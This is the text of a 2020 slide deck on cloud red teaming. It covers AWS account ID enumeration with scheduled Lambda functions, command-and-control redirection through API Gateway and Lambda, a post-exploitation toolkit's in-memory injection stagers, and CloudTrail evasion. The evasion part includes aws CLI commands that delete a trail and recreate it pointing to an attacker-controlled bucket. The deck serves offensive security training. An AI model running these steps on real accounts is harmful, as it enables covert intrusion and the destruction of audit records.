Serverless and Dys-FUNctional Cloud Red Teaming

Version 0.0.1
Copyright 2020 by Stage 2 Security
Serverless &
Dys-FUNctional
Cloud Red Teaming (AWS, Azure, GCP, etc...)

View Slide

Introduction

View Slide

About Me
Defense
DHS SOC
Offense
NSA
Red Team
Adobe DX
Bryce Kunz
@TweekFawkes

View Slide


View Slide

Special Thanks!
Michael Butler
VP of Services
& Pentest Lead
Waylon Grange
@Professor__Plum
Research Lead &
Creator of .
Scott Pack
Cloud Security
Architect at Adobe

View Slide

Overview

View Slide

Overview of Serverless Technologies, Services, & Frameworks
- API Gateway, Lambda, CloudFormation, etc.
- Zappa, AWS Serverless Application Model (SAM), etc.
Use Cases Applicable for Red Teamers, Penetration Testers, etc.
- AWS Account ID Discovery
- Command & Control through AWS Services
- Leveraging Lambda to Disrupt AWS Logging Services
Agenda

View Slide

AWS Services

View Slide

API Gateway
API Proxy (HTTP or REST) as a managed service
https:/
/aws.amazon.com/api-gateway/

View Slide

API Gateway Overview
API Gateway is a managed service that creates APIs at scale
● API that acts as a “front door” for applications to access data, business logic, or functionality from
your back-end services,
○ Such as … code running on AWS Lambda, or any web application.
API Gateway can be considered a backplane in the cloud to connect AWS services and other public or
private websites.
Provides consistent RESTful application programming interfaces (APIs) for web applications to access
AWS services.

View Slide

HTTP APIs are designed for low-latency, cost-effective integrations with AWS services
e.g. Lambda, and HTTP endpoints
REST APIs currently offer more features, and full control over API requests and responses.
API Gateway Types
https:/
/docs.aws.amazon.com/apigateway/latest/developerguide/http-api-vs-rest.html

View Slide

Lambda
AWS Scripts as a managed service
https:/
/aws.amazon.com/lambda/

View Slide

Lambda Overview
AWS Lambda is a serverless compute service
● Runs your code in response to events and automatically manages the underlying compute
resources for you.
● Lambda can automatically run code in response to multiple events, such as:
○ HTTP requests via Amazon API Gateway,
○ PutObject calls to Amazon S3 Buckets,
○ Table updates in Amazon DynamoDB, and
○ State transitions in AWS Step Functions.
● You can use AWS Lambda to extend other AWS services with custom logic

View Slide

Lambda Runtimes & Environment
● Supports many native runtimes
○ Python2.7 & 3, Java, Ruby, Go, C# +
● AWS SDKs built in (e.g. boto3)
● Role Credentials placed in Environment Variables
● Max 15 Minute Runtime

View Slide

Lambda Common Web App Architecture
https:/
/aws.amazon.com/lambda/

View Slide

CloudFormation
Amazon Services Setup
https:/
/aws.amazon.com/cloudformation/

View Slide

Administration
Control Plane (APIs)
Data Plane
Management UI Cloud Admin
(Dave)

View Slide

CloudFormation Overview
Data Plane
Cloud Automation
- CloudFormation
- Terraform
- Salt Cloud
- Custom Scripts
Automation

View Slide

Setup Resources

View Slide

Application

View Slide

Services
...
...
Storage VM App LB

View Slide

Cloud-Aware
Application
Cloud Admin
(Dave)
Ext Cloud Automation
- Terraform
- Salt Cloud
- Custom
Storage VM App LB

View Slide

Open for
Business
Cloud Admin
(Dave)
- Terraform
- Salt Cloud
- Custom
Storage VM App LB
USERS

View Slide

Serverless Frameworks

View Slide

Zappa
$ pip install zappa
$ zappa init
$ zappa deploy
Zappa makes it super easy to build and deploy server-less, event-driven Python applications (including,
but not limited to, WSGI web apps) on AWS Lambda + API Gateway (via CloudFormation).
https:/
/github.com/Miserlou/Zappa

View Slide

AWS Serverless Application Model (SAM)
https:/
/aws.amazon.com/serverless/build-a-web-app/

View Slide

Infrastructure as Code
Based on CloudFormation, but much simpler to implement common Serverless Application Models...
https:/
/aws.amazon.com/serverless/sam/

View Slide

The Serverless Application Model is commonly referred to as “SAM” in AWS documentation
SAM is NOT an AWS Service, it’s more similar to Zappa or Terraform
New Resource Types with SAM:
● AWS::Serverless::Function -> AWS Lambda Functions
● AWS::Serverless::Api -> AWS API Gateway APIs
● AWS::Serverless::SimpleTable -> AWS Dynamo DB Tables
https:/
/aws.amazon.com/serverless/sam/

View Slide

Use Cases

View Slide

Use Case # 1
Discover Account IDs
Discovering semi-sensitive information (e.g. AWS Account IDs) via analyzing responses from
various Cloud services.

View Slide

AWS Account IDs
Every AWS account is given a unique ID
Account IDs are 12 digit numbers
e.g. 885264802853
Semi-Sensitive?
Usually kept private...
But historically, considered to be
equivalent to a username disclosure

View Slide

AWS Account IDs - The Math
Account IDs are 12 digit numbers
● e.g. 885264802853
10 possible digits (0,1,2,3,4,5,6,7,8,9)
● 12 digits long
10^12 means...
● 1 Trillion! Possible Account IDs

View Slide

AWS Account IDs - Should They be Protected?
Many vendors share their Account IDs:
https://github.com/duo-labs/cloudmapper/blob/
main/vendor_accounts.yaml
To enable clients to use their services
Should They be Protected?
Tech industry is saying…
NO
Including, but not limited to:
● Rackspace
● TrendMicro
● Redlock
● Sumo Logic
● Bridgecrew
● Onelogin
● Rapid7
● Threat Stack
● Lucidchart
● Palo Alto Networks
● Tenable
etc...

View Slide

Known Attacks via Knowing Account IDs
AWS error messages disclose whether a role
exists or not, w/ a given Account ID
Role Names can disclose:
● AWS Services being used
● Software & Technologies being used
● Names of IAM users (social engineering)
● 3rd party integrations being used (Okta,
Datadog, Cloudsploit, etc.)
Once roles are enumerated, one can try to assume
any open roles and pilfer the role credentials.
Same attack vector applies for IAM Usernames
https:/
/rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/
https:/
/rhinosecuritylabs.com/aws/aws-iam-user-enumeration/
https:/
/github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_iam_principals.py

View Slide

Other Attacks via Knowing Account IDs
Areas for Future Research:
● Discovering overly privileged topics and/or
queues with guessable names
This is the way!

View Slide

Known Ways to Discover Account IDs
Including, but not limited to:
● Compromise a resource (e.g. Lambda, etc.)
● Public resources (e.g. Snapshots, AMI, etc.)
● Source Code Review (e.g. GitHub)
● Error Messages from Services
● Screenshots and/or Documentation
● Forums and/or Discussion Boards
● etc.

View Slide

https:/
/github.com/dagrz/aws_pwn/blob/master/miscellanea/Kiwicon%202016%20-%20Hacking%20AWS%20End%20to%20End.pdf
By default, login URL for the web console, includes the Account ID as a subdomain.
Subdomain has different HTTP response codes based on if login page exists
NOTE: URL can be changed by the owner of the AWS, and is done so somewhat frequently

View Slide

https:/
/github.com/dagrz/aws_pwn/blob/master/miscellanea/Kiwicon%202016%20-%20Hacking%20AWS%20End%20to%20End.pdf
VirusTotal Results:

View Slide

https:/
/github.com/Stage2Sec/CaptureTheCloud/blob/master/ﬁnd_aws_account_ids_virustotal.py
VirusTotal has updated the API now to v2, which requires a slightly different syntax to query

View Slide

Other Ways to Discover Account IDs
Other OSINT Sources:
● Passive Total <- This Works Better for Us than VirusTotal
● Amass <- Always Awesome
● etc.

View Slide

Leverage SAM to Create...
SAM:
● template.yaml
● app.py
● etc.

View Slide

SAM Template
SAM Template:
● API Gateway
○ GET /hello
● Lambda
○ Python 3.7
● Attach Policy to Enable:
○ S3 Bucket Access
● Set Timeout to Max:
○ 15 Minutes (900 Seconds)

View Slide

Lambda Application
Python App Source:
● Generate an ID
● Secrets Library
● Try w/ Web Console
● Requests Library
● Analyze Response
● Write Result to S3

View Slide

SAM Deploy
https:/
/aws.amazon.com/blogs/aws/new-aws-toolkits-for-pycharm-intellij-preview-and-visual-studio-code-preview/

View Slide


View Slide

Finding Accounts
At every 3rd minute (*/3 * * * *)
33x
~40 Account IDs (302s)
Per Hour
0-3
Second Delay
w/ Max 15 Min

View Slide

At every 3rd minute (*/3 * * * *)
33x
~40 Account IDs (302s)
Per Hour
0-3
Second Delay
w/ Max 15 Min

View Slide

Another Option: Cron via CloudWatch
https:/
/docs.aws.amazon.com/serverless-application-model/latest/developerguide/sam-property-function-schedule.html

View Slide

Correlating Account ID w/ Resources
S3 feature to validate correct bucket ownership!
If we know of a publically available object within an S3 bucket
And we think we may know
● API Gateway
○ GET /hello
● Lambda
○ Python 3.7
● Attach Policy to Enable:
○ S3 Bucket Access
● Set Timeout to Max:
○ 15 Minutes (900 Seconds)
https:/
/aws.amazon.com/about-aws/whats-new/2020/09/amazon-s3-bucket-owner-condition-helps-validate-correct-bucket-ownership/
https:/
/docs.aws.amazon.com/AmazonS3/latest/dev/bucket-owner-condition.html
https:/
/boto3.amazonaws.com/v1/documentation/api/latest/reference/services/s3.html
S3 feature to validate correct bucket ownership!
If we know of a publically available object within an S3 bucket
e.g. a static resource (image, javascript, etc.) for a public website
We can check to see if an AWS Account ID is associated with it via this API!

View Slide

Use Case #2
Serverless C2
Elegantly Redirecting a Red Team’s Command & Control (C2) through Cloud services (e.g. AWS
API Gateway & Lambda, Azure Functions, etc.) to camouﬂage C2.

View Slide

Azure: Domain Fronting
https:/
/truneski.github.io/blog/2019/02/27/empire-domain-fronting-with-microsoft-azure/

View Slide

Azure: Functions - Serverless Redirection
https:/
/fortynorthsecurity.com/blog/azure-functions-functional-redirection/
https:/
/medium.com/@rvrsh3ll/azure-app-services-for-oﬀensive-operations-f1de99a83fa0

View Slide

AWS: API GW & Lambda - Serverless Redirection
https:/
/blog.xpnsec.com/aws-lambda-redirector/

View Slide

...
Cross Platform
Post Exploitation Toolkit

View Slide

Cross Platform (Linux, macOS, & Windows)
Post Exploitation Red Team Toolkit
Designed for Red Teams operating within the tech sector (macOS laptops w/ Linux production servers):
● Initiative Multi-User Collaboration,
● OPSEC from the ground up (e.g. Memory Only),
● Pivoting (chaining callbacks & listeners),
● Scripting (python in memory only),
● & more!

View Slide

Voodoo Overview
The overview Screen provides a quick look at
what agents you have and how their comms are
being routed. Agents shown in gray are dead
agents which have stopped calling in. You can
double click on any of the icons to jump right to
that agent.

View Slide

Voodoo Boneyard
Once an agent is presumed dead you can move it
to the boneyard by clicking the X button on the
top right of the agent (it is a check mark in the
picture to the right). This allows you to keep you
agent less cluttered while still keeping logs of
previous activities. If at anytime an agent in the
boneyard list suddenly becomes online it will
automatically move back to the agents list.

View Slide

Voodoo Users
Voodoo is a multi-operator concurrent system. By
creating separate accounts for each of your team
members you can log who issued which
commands and each work independently or
collaboratively on the same agents. Two Factor
authentication is also available should you require
tighter control on access to your operations.

View Slide

Voodoo Stager (communication options)
● Name -- a name for your reference
● Communication Style
○ HTTPS call-back -- The agent will initiate
connections to the Voodoo LP over a
speciﬁed port to check for tasking
○ TLS Call-in -- The agent will listen on a
speciﬁed port for the Voodoo LP to connect
into it and provide tasking
● Call-out options
○ Domain -- address where agent calls back
○ Port -- port to use (typically 443)
○ Interval how often to check-in
● Call-in options
○ Port -- port to listen on for inbound
connections

View Slide

Voodoo Stager (target environment options)
● Target -- OS Family you are targeting
● Host Process -- An executable which the
agent will be injected into
○ This must be a valid executable on the target
● Command Argument / Passphrase
○ This is the command line argument that will
show up in a ps list
○ It is also used as a decryption key for the
agents conﬁguration
● Update -- Click this button to save your
changes

View Slide

Voodoo Stager (execution options)
● Script tabs -- These are a number of
different one lines you can use to execute
the agent.
○ Each is for a different environment
○ On older Linux systems (or target where
SYS_PTRACE is disabled) there is an “No
Inject” option
○ On windows there is also a powershell
option
● Download Executable -- Alternatively, you
can download an executable transfer it to
the target and run it manually.
○ exename targetprocess passpharse

View Slide

Stagers (under the hood)
● The one liners (stagers) bootstrap voodoo
a. Downloads an encoded reﬂective library
b. Decodes and loads the library into current process
c. Calls library function with passphrase and name of target process
■ The library then starts up the target process
■ Hollows out target process
■ Injects voodoo
■ Cleans up any artifacts
d. Original process then exits

View Slide

Injection
● Voodoo uses a custom shellcode bootstrap
that loads a dll into memory
○ Doesn’t touch disk
○ Avoids creating RWX memory sections
○ Supports C++ exception handling
■ Even in injected libraries
○ After injection bootstrap wipes itself from
memory

View Slide

Secure Communication Channels
● Although Voodoo uses HTTPS/TLS for C2 communication it doesn’t rely on it for security
○ Many SSL visibility products exist
○ What about MitM?
● Voodoo uses ChaCha20 and Poly1305 underneath to protect PII of target
○ Less processor intensive than AES, but same level of security
○ Uses a one time pad to encrypt data
○ More difﬁcult to signature compared to AES
○ Each agent is keyed with the public key of the LP, no MitM
○ Each Agent generates a unique private key
○ If one agent were to be compromised, all other agent comms would still be secure.

View Slide

Public
10.0.1.0/24
Web App
Private
10.0.2.0/24
#0 - Exploit

View Slide

Public
LP
10.0.1.0/24
Web App
Private
10.0.2.0/24
#1 - Callback

View Slide

Public
LP
10.0.1.0/24
Web App
Private
10.0.2.0/24
Database
#2 - Connect
#1 - Callback

View Slide

Public
LP
10.0.1.0/24
Web App
Private
10.0.2.0/24
Database
#2 - Connect
#1 - Callback
Monitoring

View Slide

Public
LP
10.0.1.0/24
Web App
Private
10.0.2.0/24
Database Monitoring
#2 - Connect
#1 - Callback
#3 - Connect

View Slide

Public
LP
10.0.1.0/24
Web App
Private
10.0.2.0/24
Database Monitoring
Secrets!
#2 - Connect
#4
- Connect
#1 - Callback
#3 - Connect

View Slide

API Gateway

View Slide

Flow
API Gateway Redirector
Ref: https:/
/aws.amazon.com/blogs/aws/identify-unintended-resource-access-with-aws-identity-and-access-management-iam-access-analyzer/

View Slide

Flow
API Gateway
Ref: https:/
HTTPS
HTTPS
Agent LP

View Slide

API Gateway & Lambda

View Slide

Flow
API Gateway
Ref: https:/
Base64
HTTPS Py Urllib
Lambda
Agent LP

View Slide

Blog Post:
AWS API Gateway fronting for Command and Control
Ref: https:/
/medium.com/stage-2-security/aws-api-gateway-fronting-for-command-and-control-45d03dﬀb24e
Waylon Grange
@Professor__Plum
Stage2Sec.com -> “About Us” -> “Blog”
https://medium.com/stage-2-security
Content-Type: application/octet-stream

View Slide

Use Case #3
Lambda Log Disruption
Disrupting Logging Services (e.g. AWS CloudTrail) with Serverless applications (e.g. Lambda) to
remain undetected within compromised AWS environments.

View Slide

AWS: Logging Overview
Overview

View Slide

CloudTrail - Control Plane ( e.g. API ) Logging
CloudTrail provides event history of your AWS account activity, including
actions taken through the:
● AWS Management Console,
● AWS SDKs,
● command line tools,
● and other AWS services.
This event history simpliﬁes security analysis, resource change tracking,
troubleshooting and Incident Response (IR).

View Slide

Data Plane
Data Plane
- Terraform
- Salt Cloud
- Custom
USERS

View Slide

Logging Disruption
via Lambda!
Overview

View Slide

CloudTrail
Logging
10.0.1.x 10.0.2.x
Private
10.0.2.0/24
Public
10.0.1.0/24
VPC 10.0.0.0/16
Control
Plane
Bucket
CloudTrail
SSH
Logs
CloudTrail provides event history of your
AWS account activity,
including actions taken through the:
● AWS Management Console,
● AWS SDKs,
● command line tools,
● and other AWS services.
This event history simplifies security
analysis, resource change tracking, and
troubleshooting.

View Slide

10.0.1.x 10.0.2.x
Private
10.0.2.0/24
Public
10.0.1.0/24
VPC 10.0.0.0/16
Control
Plane
Bucket
CloudTrail
SSH
Logs
- S3 Write Triggers a Lambda function
- Lambda function scrubs logs of
● Attacker’s Actions
● Attacker’s IP Addresses
- Ideally, other logging systems collect the
cleaned log files from S3
CloudTrail
Logging Disruption

View Slide

AWS: Buﬀering Dominos
Overview

View Slide

CloudTrail
...
CloudTrail S3 Bucket
Internet
...
Users
...
...

View Slide

CloudTrail: Buﬀering
...
Internet
Users
...
Buffer
...
...

View Slide

CloudTrail: Suspicious Notable
Internet
...
Buffer
...
...
Suspicious?

View Slide

CloudTrail: DeleteTrail
Internet
DeleteTrail
Buffer
DeleteTrail
DeleteTrail
Detected!

View Slide

CloudTrail: Delete & Create w/ Attacker Bucket
...
Internet
S3 Bucket
CreateTrail
Buffer
...
DeleteTrail
DeleteTrail
DeleteTrail

View Slide

CloudTrail: Delete & Create w/ Attacker Bucket
...
aws sts get-caller-identity --profile target
aws cloudtrail describe-trails --profile target
… redteam017s3bucket001 ...
aws cloudtrail delete-trail --name "redteam017trail001" --profile target
aws cloudtrail create-trail --name "redteam017trail001" --s3-bucket-name "redteam017s3bucket101"
--is-multi-region-trail --profile target
aws cloudtrail start-logging --name "redteam017trail001" --profile target

View Slide

Blog:
AWS CloudTrail Logging Logic Flaw
Ref: https:/
/medium.com/stage-2-security/aws-api-gateway-fronting-for-command-and-control-45d03dﬀb24e
Bryce Kunz
@TweekFawkes
Stage2Sec.com -> “About Us” -> “Blog”
https://medium.com/stage-2-security

View Slide

Conclusion

View Slide

Thank You! [email protected]
Bryce Kunz
@TweekFawkes
Trainings: Hands-On Cloud Red Teaming
Code: Github.com/Stage2Sec/CaptureTheCloud
Slides: SpeakerDeck.com/TweekFawkes

View Slide

Serverless and Dys-FUNctional Cloud Red Teaming

Serverless and Dys-FUNctional Cloud Red Teaming

TweekFawkes

More Decks by TweekFawkes

Other Decks in Technology

Featured

Transcript